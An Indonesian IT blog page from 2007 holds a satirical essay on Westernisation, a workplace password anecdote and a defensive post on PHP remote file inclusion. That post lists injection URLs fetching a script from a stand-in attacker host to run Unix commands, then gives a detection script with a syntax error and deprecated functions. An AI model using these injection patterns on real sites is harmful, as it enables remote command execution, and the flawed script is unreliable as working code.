LaGiPusHinGWitH ----- IT

About This Site

Teknologi Informasi sangatlah penting untuk menunjang kemajuan ilmu pengetahuan di Indonesia pada khususnya. Dan ini semua haruslah ditunjang dengan kemampuan yang sepadan dengan kemajuan teknologi itu sendiri, terlebih untuk para praktisi IT itu sendiri. Akhir kata "Selamat berkarya" untuk kita semua. koy^k^guy^ - Owner

Navigation

Home |

Calendar

<<	August 2007					>>
S	M	T	W	T	F	S
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Monthly Archives

Most recent entries

Syndicate

RSS 2.0
Atom

Referrers

Site Credits

Design by:
BlogMoxie

Sunday, August 26, 2007

Indonesia lebih barat daripada barat

DAri milis nih...buat bahan renungan
Indonesia Lebih Barat dari Barat
By: Ida Arimurti

Lucu juga, mentertawakan diri sendiri yg sangat inferiority complex..
Pernahkah ketika anda masih SMA pergi ke Club atau Diskotik?.. saya pernah! dan bangga banget!
Pernah ke New York City?.. my city! tapi bete ama bouncer-nya gak boleh masuk gara-gara umur waktu itu masih 20 lebih 9 bulan! Damn, I Love Indonesia, lebih bebas!

Sapa bilang Amerika negara bebas??? Pernahkan anda melihat (atau merasakan sendiri) sekelompok anak muda minum bir?… wah bukan pemandangan anehdi parkiran Circle K Bandung! every single store! Tau Texas?.. Tau! Kota yang ngga boleh minum alkohol sembarangan kan? mending di Bandung, atau di Jakarta, mau mabok sambil nyetir juga boleh!

Pernahkah anda membeli majalah yang porno, setengah porno -apapun sebutannya- yang covernya adalah wanita berbikini dengan headline 7 Trik Liar Di atas Ranjang?
Kupu Kupu Malam Kota Solo dan majalah yang setiap edisinya tidak pernah luput dari kata Mr. Happy? ...

Ngga tuh (Boong!! Liat ada apa di bawah kasur? yang diumpetin di lemari? Bagasi mobil belakang)..
Di mana anda beli majalah Playboy? atau majalah sejenis itu?.. sebelum ke kantor di tukang koran, dan bangga banget punya playboy karena ngga usah subscribe kaya di Amerika, aneh padahal negara USA produsen-nya kok mereka ribet banget sih, harus liatin ID segala?

di Indonesia di emperan juga ada, di mana aja yang penting hatibangga! Siapa yang bangga ada majalah Playboy Indonesia? Siapa yang bangga dengan Cosmopolitan Indonesia? .. Ya orang Indonesia, mereka bangga! Playboy pertama di Asia Tenggara!! (tapi kok di Malaysia malah ngga ada, malahan di Singapore majalah sekelas Cosmopolitan aja dibredel? mereka bodo banget deh)

Kita seneng deh mengadopsi semua hal dari luar negeri!
Siapa yang suka nonton plagiatnya Saturday Night Live?… Gila lucu banget ya? Lucu mana dengan Indonesia yang suka niru?

Siapa yang BENCI Amerika???… KITAAA ORANG INDONESIA BENCI banget Amerika, makanya kita memilih dan senengggg banget minum Pepsi, Beli MC.D, Pake HaPe Motorola, Nonton film Hollywood, Beli I-Pod, Ngopi di Starbucks, Nonton Desperate Housewives, Ikutan Test TOEFL ..

Siapa benci Eropa? dan hal yang kebarat-baratan? ...
Kita deh sebagai Orang Indonesia, makanya kita belanja di Mall yang gaya eropabanget, Belanja baju di Mango, Makan Steak, Melakukan free sex biar kaya James Bond dan Matahari (anda pasti tau dong siapa dia kalau anda bisa berkomentar tentang RUU
APP) ..

kita juga sebel banget dengan hal yang
kebarat-baratan apalagi eropa, makanya kita pake handphone Nokia dan mobil BMW ..

Mau ngga jadi tuan rumah Miss Universe?… DI INDONESIA??? KAPAN??? SERU BANGET TUH!!! aduh banyak cewek kece pake bikini. Udah malem finalnya di Indonesia aja, daripada di amerika kan udah ditolak, di Puerto Rico kan kemaren males jadi tuan rumah, lagian bukannya sekarang Tuan Rumah Miss Universe sedang dilempar ke negara miskin dan third world karena dianggap basi ama Amerikanya sendiri??

Indonesia sih pasti seneng banget dan bangga banget jadi buangan tuan rumah Miss Universe!
Pilih masuk AFI atau jadi juara Olimpiade Fisika? ...
AFI dong, kondang bo! kalau bisa semua masukreality show!

Olimpiade Fisika ngapain? paling direkrut ama Singapore atau Jerman, duh pendidikan itu ngga penting di Indonesia .. yang penting outlook, mudah membual, nepotisme.. kalau mau terlihat berpendidikan berlagak sok pinter aja.. asal lo bisa bual tentang playboy, RUU APP, meski belum tentu bener, yang penting ngomong!

Suka Infotainment? ... duuh kita sebagai orang Indonesia tuh seneng banget gila kalau ngomongin orang yang jelek-jeleknya.. Kita selalu haus dengan terbukanya Aib, daripada kaya Singapore yang malah bangga dengan National Geographic? apa gunanya?

Kalau E! chanel suka?.. duh cable masih jarang sih di Indonesia,di Pedesaan belom masuk.. jadi kita ngga tau.. lagian acaranya ngga mutu ya ngomongin artis dari sisi glamour dan kreatifnya doang, kurang ngomongin aib!

Cinta Produk Indonesia?.. duh Soeharto banget sih jamannya ACI, gihke malaysia aja yang produk lokalnya lebih kepake dari pada Pierre Cardin, Hugo Boss, Esprit, U2 ..

kita lebih suka negara kita “terjajah” dan dibanjiri produk asing ..emang kita Jepang yang produktif? lebih hebat kita dong, Indonesia yang selalu konsumtif tanpa jadi produktif, ampe minyak aja impor .. kita negara terkaya di dunia!

Bisa menari atau menyanyi khas Indonesia?..bisa, aku bisa breakdance dan ngerap pake bahasa Indonesia Apa itu Indonesia?.. Jawa minus Jawa Barat selebihnya negara tetangga,presiden jawa, menteri jawa, pejabat militer jawa,yang bukan orang Indonesia ngga boleh jadi presiden

Jakarta itu apa?.. Ibu Kota, pusat ekonomi, pusat bisnis, pusat pemerintahan, pusat indutrsi, pusat belanja, pusat hiburan, semua terpusat disini deh, ada Taman Mini Indonesia juga makanya untuk apa peduli ama Indonesia yang luas? yang mini-mini aja dulu ..

Tau fungsi dari New York City, Washington D.C, Los Angeles (Hollywood),Nebraska, Texas di Amerika? ..
aduh maaf pengetahuan kita terbatas, emang apaan sih? lagian kita tuh benci banget Amerika meski kita baca Playboy (dijawab dengan muka malu)

Dimana letak Bali?.. deket Indonesia
Apa arti Bhineka Tunggal Ika? .. biar beda dipaksa satu! tidak ada perbedaan yang ada penyatuan, negara hebat kan bisa mempersatukan yang beda ??

WOW Ada apa di program TV Indonesia selain beritanya?.. ada acara yang semua acaranya bisa didapet di TV-TV lain, pokoknya sejenis semua, ya Bhineka Tunggal Ika tadi.. kita kan lebih peduli rating (ssst! jangan bilang-bilang orang ya, tapi kita selalu punya pembenaran yang bisa bikin orang percaya kok)..

makanya orang Indonesia pinter-pinter kan? bisa menjadi negara yang melesat padahal ngga punya landasan .. Siapa sih yang bisa jadi PuteriIndonesia?.. Itu loh yang bisa bilang negara Indonesia memiliki keanekaragaman budaya! pinter banget kan dia jawab kaya gitu? dia berpikir keras bahwa cuma Indonesia yang punya keanekaragaman budaya.. negara lain emang ada?

eh .. atau si Puteri belum pernah ke baca buku? dia hobby dandan sih! atau si Puteri belum pernah ke keluar negeri ya? nah makanya dia disebut Puteri Indonesia yang Indonesia banget!

Posted by roninmorgue on 08/26 at 09:31 PM
Computer Diary • (3) Comments • (62) Trackbacks • Permalink

Little mistake but damn!!!

Nov 25, 2006

Lagi asyik2nya gw remote server DataBase gw, tiba2 aja ada pesen masuk...hmmm apa yahh n dari siapa nih??
(Mungkin nga yah dari mahluk manis penghuni LT3....abis mayoritas cewe sih Smile )
Olala ternyata dari Supervisor LT3, di LT3 itu dari Departemen Sales divisi Telemarketing (cowo pula).....
Begini bunyi pesennya...."Pak Gunawan, Aplikasi input data tidak bisa koneksi ke database. Sedangkan aplikasi
tersebut diperlukan untuk melakukan input data customer baru, harap dicek secepatnya”. Yahhhhh...orang lagi banyak
kerjaan juga, (gw lagi setting ulang server gw buat persiapan upgrade ke Oracle 10g). Walhasil dengan langkah gontai
dan wajah kusut masai, dengan seikat rumput di bibir...halah kaya bikin cerita aja (ini asli rekasayasa gw aja sih),
gw ke Lt3 n langsung nemuin SPV nya. Pas gw coba jalanin tuh aplikasi ... yup ternyata emang nga bisa konek kedatabase,
apa ya masalahnya...biasanya normal2 aja (yee..jelas normal lah biasanya, kl nga normal2 dari dulu lo nga bakalan dipanggil man).

Ya udah gw coba buka deh source codenya, liat2 koneksi ke Databasenya...normal nga ada yang salah, koneksi jaringan ke server… OK!
Apalagi yah...hmmm oh yah, restart komputernya aja Pak...(gw minta ke SPV supaya restart dia punya komputer...siapa tau berhasil),
eit protes yah...kok caranya mangga dua banget(bodo amat, daripada so mangga muda, mangga harum manis n etc lah).
Hmmm...sambil nunggu booting komputer iseng gw liat2 pemandangan indah nan elok...cos, yah lo tau sendiri lah man.
Dah benerkan...username sama passwordnya?? Udah pak!
Yup di coba lagi Pak..aplikasinya, eng ing eng...tadaaaa.., jreg!!!glek nga bisa juga!!! Damn, what the Hell Shit!!!

Akhirnya gw ambil kesimpulan jangan2 servernya bermasalah lagi nih!! oh yah servernya terpisah loh dari server yang lagi gw
setting ulang. Cek...cek...cek sound...nga papa, ditambah LT2 nga pada komplen..so berarti server no problemo. Akh daripada
gw pusing sendirian mending gw laporan deh sama komandan..eh sama manager gw. n Jawabannya adalaaaaahhh......restart server!!
Guuubraak...lebih mangga dua dari gw(hehehehhe.....berarti itu adalah memutus semua koneksi divisi sales yang sedang melobi
para customer atau mungkin ada yang sedang melakukan input data) but anyway..Duty is duty, walhasil gw kasih pengumuman.

Peenguman...pengumuman, untuk semua divisi yang berhubungan dengan Database DB4454 harap tidak melakukan aktifitas apapun juga,
dikarenakan pesawat mengalami turbulunce..eit salah deng, server mengalami kendala abnormal( hehehe so politis )
Yup server down...restart, database is running.... hmmm, pasti berhasil nih pikir gw (orang langsung server man yang direstart padahal
nga jadi jaminan juga sih).Dan hasilnya adalah kita tanyakan pada APV eit salah SPV Lt3...Blum bisa juga Pak Gunawan, Gabruk...gusrak!!!Oh my god...why???
Iseng gw tanya ama dia… tadi login ke komputernya benerkan pake username n password yang sama, yup!!!
ini account yang sama kan ... yup!!!
kemaren juga pake account ini kan ... yup!!!
hmmm...berarti account nga masalah nih.
Penasaran gw suruh aja dia restart lagi tuh komputernya..nah pas sampe login gw pantengin tuh loginnya dia
username ... bener ,
password ... elah dalah, ini nih permasalahannya. Si SPV nga masukkin password yang dah keregister keserver.
Dia rubah tuh password sama tanggal lahir anaknya, yah nga dikenallah sama tuh server…
Tapi pak saya tetep bisa login tuh...gundulmu, login mang nga ada masalah but koneksi yang bermasalah.
Lo pake boong pula lagi, bilang account sama kaya kemaren.

Gimana nga gondok sodara2, dah abis waktu gw...sampe restart server, ngasih pengumuman.
membuat aktifitas terhenti… cuma gara2 masalah password (damn).
Semenjak itu, kebijaksanaan about hak akses user sangat2 dibatasi sampe buat ngopy ke flasdisk aja nga bisa.

Kayanya salah gw juga sih yang melihat permasalahan langsung meluas tanpa melihat kemungkinan yang paling kecil.
But anyway..itu tetep jadi pengalaman buat gw..Ya toh...?? Toh Smile

Posted by roninmorgue on 08/26 at 09:19 PM
Computer Diary • (1) Comments • (141) Trackbacks • Permalink

PHP Injection Prevent

Category: Security
Author: roninmorgue
Date: January, 01st 2007
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/

----------------------------------------------------------------------------------

Affected Description
`````````````````````

Serangan web dewasa ini semakin banyak memanfaatkan vulnerabillity pada script PHP, yaitu saat seorang programmer tidak
melakukan sanitasi input pada script yang dia buat, disaat register_globals ON dan allow_fopen_url maka seorang attacker
dapat melakukan injeksi pada script PHP yang vulnerable secara remote.

Caranya yaitu dengan mengeksekusi script vulnerable dengan meng-inject melalui url dari server attacker yang telah berisi
script untuk melakukan exploitasi.
Dampak ini dapat dihilangkan dengan men-set register_globals OFF, tetapi cara ini kurang effektif karena banyak aplikasi
third party yang mengharuskan register_globals ON.

Better Solutions
``````````````````

Teknik-teknik PHP Injection yang sering digunakan oleh attacker :

1. ?&cmd;=<unix command>
2. &cmd;=<unix command>
3. http://www.target.com/main.php?r=http://attacker/cmd.txt\&cmd;=<unix command>
4. http://www.target.com/main.php?r=http://attacker/cmd.txt&cmd;=<unix command>
5. ?cmd=<unix command>

dengan melihat url tersebut kita dapat mengambil kesimpulan bahwa :

1. attacker menyimpan script inject dalam bentuk extension jpg, gif, dan txt
2. attacker menggunakan variabel cmd untuk injection
3. attacker menggunakan beberapa kombinasi penghubung

Berdasarkan hal tersebut kita dapat membuat sebuah script sederhana untuk mensanitasi bentuk url yang dicurigai sebagai
bentuk PHP Injection, serta melakukan logging terhadap aktifitas dari attacker.

Ok...to the point, this the script :
sertakan script ini pada file konfigurasi aplikasi kita.

1. <?php
2.
3. if (
4. ereg('gif\?cmd',$_SERVER['REQUEST_URI']) ||
5. ereg('gif&cmd;',$_SERVER['REQUEST_URI']) ||
6. ereg('jpg\?cmd',$_SERVER['REQUEST_URI']) ||
7. ereg('jpg&cmd;',$_SERVER['REQUEST_URI']) ||
8. ereg('txt?cmd',$_SERVER['REQUEST_URI']) ||
9. ereg('txt&cmd;',$_SERVER['REQUEST_URI']) ||
10.
11. ereg('gif\?',$_SERVER['REQUEST_URI']) ||
12. ereg('gif&',$_SERVER['REQUEST_URI']) ||
13. ereg('jpg\?',$_SERVER['REQUEST_URI']) ||
14. ereg('jpg&',$_SERVER['REQUEST_URI']) ||
15. ereg('txt?',$_SERVER['REQUEST_URI']) ||
16. ereg('txt&',$_SERVER['REQUEST_URI'])
17.
18. )
19. {
20. // bagian untuk mencatat aktifitas hacking
21. // dan mengirimkan email pada administrator
22.
23. $ip = $_SERVER['REMOTE_ADDR'];
24. $date = date("m/d/Y g:i:s a");
25. $referer = $_SERVER['HTTP_REFERER'];
26. $uri = $_SERVER['REQUEST_URI']
27.
28. $fl = fopen('log.txt', 'a');
29. fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$uri."\n");
30. fclose($fl);
31. $msg = "Terdapat percobaan hacking pada server ".$_SERVER['REMOTE_ADDR']."
mencoba untuk mengeksekusi ".$_SERVER['REQUEST_URI'];
32. mail('anstellwinkel@yahoo.com.au' ,'Percobaan hacking pada '.$_SERVER['REQUEST_URI'],$msg);
33. die('Silahkan hentikan percobaan anda!');
34. }
35.
36. ?>

penjelasan :

Baris 1 - 16 --> apabila ditemukan pola tersebut pada url maka script ini akan dieksekusi
Baris 23 - 30 --> mencatat IP address, tanggal, referer dan url yang digunakan oleh attacker serta mencatatnya pada
file log.txt
Baris 31 - 33 --> Mengirim semua aktifitas hacking ke email administrator

------------------------------------------------------------

Shoutz:
~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie, cloud, acieis)
~ mercubuana-it@yahoogroups.com ,
~ x-code staff n members at yogya_family_code, ^family_code^,
---------------------------------------------------------------

Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
anstellwinkel[at]yahoo[dot]com[dot]au
petambakudang[at]yahoo[dot]co[dot]id
---------------- [ EOF ] ----------------------------------------

Posted by roninmorgue on 08/26 at 12:04 AM
Computer Security • (0) Comments • (61) Trackbacks • Permalink

Page 1 of 1 pages